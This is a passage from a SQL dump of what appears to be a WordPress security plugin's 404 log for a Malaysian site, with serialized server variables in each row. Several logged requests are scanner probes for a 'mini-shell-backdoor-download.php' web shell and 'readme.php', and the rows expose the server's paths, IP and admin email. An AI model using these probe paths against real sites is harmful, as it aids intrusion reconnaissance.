ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZgubb-TGwg8JtoKWMV6NAAAABU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570254445.4867\";s:12:\"REQUEST_TIME\";s:10:\"1570254445\";}}','notice','2019-10-05 05:47:27','2019-10-05 05:47:25',35037176,36838168,'https://bintara.com.my/blog/?xxxxxxxxxxxx_loads=true',1,0,'51.255.43.81'),(27524,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:29:\"/www/?xxxxxxxxxxxx_loads=true\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/www/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:5:\"/www/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZgfd4UvsCPAO@kc@Ic-oAAAAFU\";s:19:\"REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/www/\";s:19:\"REDIRECT_SCRIPT_URL\";s:5:\"/www/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZgfd4UvsCPAO@kc@Ic-oAAAAFU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"188.213.175.168\";s:11:\"REMOTE_PORT\";s:5:\"60070\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:27:\"https://bintara.com.my/www/\";s:10:\"SCRIPT_URL\";s:5:\"/www/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZgfd4UvsCPAO@kc@Ic-oAAAAFU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570250615.7467\";s:12:\"REQUEST_TIME\";s:10:\"1570250615\";}}','notice','2019-10-05 04:43:38','2019-10-05 04:43:36',35035488,36835008,'https://bintara.com.my/www/?xxxxxxxxxxxx_loads=true',1,0,'188.213.175.168'),(27593,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:53:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:42:\"/rtf557lt/mini-shell-backdoor-download.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:64:\"https://bintara.com.my/rtf557lt/mini-shell-backdoor-download.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:42:\"/rtf557lt/mini-shell-backdoor-download.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZpms3KWq-OQ7bMwJVWoGwAAAVc\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:64:\"https://bintara.com.my/rtf557lt/mini-shell-backdoor-download.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:42:\"/rtf557lt/mini-shell-backdoor-download.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZpms3KWq-OQ7bMwJVWoGwAAAVc\";s:19:\"REDIRECT_SCRIPT_URI\";s:64:\"https://bintara.com.my/rtf557lt/mini-shell-backdoor-download.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:42:\"/rtf557lt/mini-shell-backdoor-download.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZpms3KWq-OQ7bMwJVWoGwAAAVc\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"95.216.20.23\";s:11:\"REMOTE_PORT\";s:5:\"37736\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:64:\"https://bintara.com.my/rtf557lt/mini-shell-backdoor-download.php\";s:10:\"SCRIPT_URL\";s:42:\"/rtf557lt/mini-shell-backdoor-download.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZpms3KWq-OQ7bMwJVWoGwAAAVc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570399923.2173\";s:12:\"REQUEST_TIME\";s:10:\"1570399923\";}}','notice','2019-10-06 22:12:05','2019-10-06 22:12:03',35043152,36846592,'https://bintara.com.my/rtf557lt/mini-shell-backdoor-download.php',1,0,'95.216.20.23'),(27594,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:53:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:42:\"/rtf557lt/mini-shell-backdoor-download.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:64:\"https://bintara.com.my/rtf557lt/mini-shell-backdoor-download.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:42:\"/rtf557lt/mini-shell-backdoor-download.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZpmtVZYXq7JUIqbrPgRVAAAAYw\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:64:\"https://bintara.com.my/rtf557lt/mini-shell-backdoor-download.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:42:\"/rtf557lt/mini-shell-backdoor-download.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZpmtVZYXq7JUIqbrPgRVAAAAYw\";s:19:\"REDIRECT_SCRIPT_URI\";s:64:\"https://bintara.com.my/rtf557lt/mini-shell-backdoor-download.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:42:\"/rtf557lt/mini-shell-backdoor-download.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZpmtVZYXq7JUIqbrPgRVAAAAYw\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"95.216.20.23\";s:11:\"REMOTE_PORT\";s:5:\"38646\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:64:\"https://bintara.com.my/rtf557lt/mini-shell-backdoor-download.php\";s:10:\"SCRIPT_URL\";s:42:\"/rtf557lt/mini-shell-backdoor-download.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZpmtVZYXq7JUIqbrPgRVAAAAYw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570399926.0747\";s:12:\"REQUEST_TIME\";s:10:\"1570399926\";}}','notice','2019-10-06 22:12:07','2019-10-06 22:12:06',35043152,36846592,'https://bintara.com.my/rtf557lt/mini-shell-backdoor-download.php',1,0,'95.216.20.23'),(27595,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:28:\"/defence-security-solutions/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:50:\"https://bintara.com.my/defence-security-solutions/\";s:19:\"REDIRECT_SCRIPT_URL\";s:28:\"/defence-security-solutions/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZpt3oMFLk21hQvqQVuzdQAAAdc\";s:12:\"REDIRECT_URL\";s:28:\"/defence-security-solutions/\";s:11:\"REMOTE_ADDR\";s:12:\"40.77.167.50\";s:11:\"REMOTE_PORT\";s:5:\"12707\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:50:\"https://bintara.com.my/defence-security-solutions/\";s:10:\"SCRIPT_URL\";s:28:\"/defence-security-solutions/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZpt3oMFLk21hQvqQVuzdQAAAdc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570401758.7787\";s:12:\"REQUEST_TIME\";s:10:\"1570401758\";}}','notice','2019-10-06 22:42:40','2019-10-06 22:42:39',33973968,35782072,'https://bintara.com.my/defence-security-solutions/',1,0,'40.77.167.50'),(27596,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:68:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/readme.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"463-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"463-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"463-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/readme.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:11:\"/readme.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZpt8YMFLk21hQvqQVuziwAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/readme.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/readme.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZpt8YMFLk21hQvqQVuziwAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"94.73.148.70\";s:11:\"REMOTE_PORT\";s:5:\"19988\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/readme.php\";s:10:\"SCRIPT_URL\";s:11:\"/readme.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZpt8YMFLk21hQvqQVuziwAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570401777.5663\";s:12:\"REQUEST_TIME\";s:10:\"1570401777\";}}','notice','2019-10-06 22:42:59','2019-10-06 22:42:57',35052288,36853992,'https://bintara.com.my/readme.php',1,0,'94.73.148.70'),(27597,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:68:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/readme.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"468-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"468-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"468-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/readme.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:11:\"/readme.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZpuD4MFLk21hQvqQVuzqwAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/readme.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/readme.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZpuD4MFLk21hQvqQVuzqwAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"94.73.148.70\";s:11:\"REMOTE_PORT\";s:5:\"21942\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/readme.php\";s:10:\"SCRIPT_URL\";s:11:\"/readme.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZpuD4MFLk21hQvqQVuzqwAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570401807.2868\";s:12:\"REQUEST_TIME\";s:10:\"1570401807\";}}','notice','2019-10-06 22:43:28','2019-10-06 22:43:27',35052288,36853992,'https://bintara.com.my/readme.php',1,0,'94.73.148.70'),(27598,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:68:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/readme.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:4:\"15-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 